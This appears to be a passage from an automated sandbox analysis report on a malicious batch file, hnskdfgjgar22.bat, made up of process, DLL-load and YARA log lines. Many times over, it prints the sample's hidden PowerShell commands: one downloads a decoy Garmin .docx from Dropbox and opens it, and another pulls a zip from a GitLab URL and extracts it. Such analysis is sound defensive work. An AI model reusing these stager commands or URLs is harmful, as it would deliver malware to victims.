                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z1x3zxk2.zf1.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnskdfgjgar22.bat" "
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\chcp.comKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnskdfgjgar22.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\hnskdfgjgar22.bat"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\hnskdfgjgar22.bat"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\hnskdfgjgar22.bat"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\hnskdfgjgar22.bat"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx'"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/awsr/ga/-/raw/main/FGA2112.zip', 'C:\Users\Public\Document.zip')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\hnskdfgjgar22.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\hnskdfgjgar22.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\hnskdfgjgar22.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\hnskdfgjgar22.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx'"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/awsr/ga/-/raw/main/FGA2112.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbn_ source: powershell.exe, 0000000B.00000002.1744666842.000001C9653F1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\Vinay\Projects\simple_launcher\dist\t64.pdb source: pip.exe.18.dr
                Source: Binary string: n.pdb source: powershell.exe, 0000000B.00000002.1745510882.000001C965543000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 0000000B.00000002.1744666842.000001C965357000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1744666842.000001C9653CB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: em.pdb source: powershell.exe, 0000000B.00000002.1745510882.000001C965560000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: em.pdbw source: powershell.exe, 0000000B.00000002.1745510882.000001C965560000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: Yara matchFile source: hnskdfgjgar22.bat, type: SAMPLE
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx'"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/awsr/ga/-/raw/main/FGA2112.zip', 'C:\Users\Public\Document.zip')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx'"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/awsr/ga/-/raw/main/FGA2112.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
                Source: pip3.exe.18.drStatic PE information: real checksum: 0x2a492 should be: 0x1dca3
                Source: wsdump.exe.18.drStatic PE information: real checksum: 0x2a492 should be: 0x1c91b
                Source: normalizer.exe.18.drStatic PE information: real checksum: 0x2a492 should be: 0x1ebd5
                Source: pip3.12.exe.18.drStatic PE information: real checksum: 0x2a492 should be: 0x1dca3
                Source: pip.exe.18.drStatic PE information: real checksum: 0x2a492 should be: 0x1dca3
                Source: x86_64-w64-mingw32-nmakehlp.exe.18.drStatic PE information: section name: .xdata
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B867047 push esp; retf 11_2_00007FFD9B867048
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B8600BD pushad ; iretd 11_2_00007FFD9B8600C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9BAB7FF9 push esi; iretd 18_2_00007FFD9BAB7FFA

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/awsr/ga/-/raw/main/FGA2112.zip', 'C:\Users\Public\Document.zip')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/awsr/ga/-/raw/main/FGA2112.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
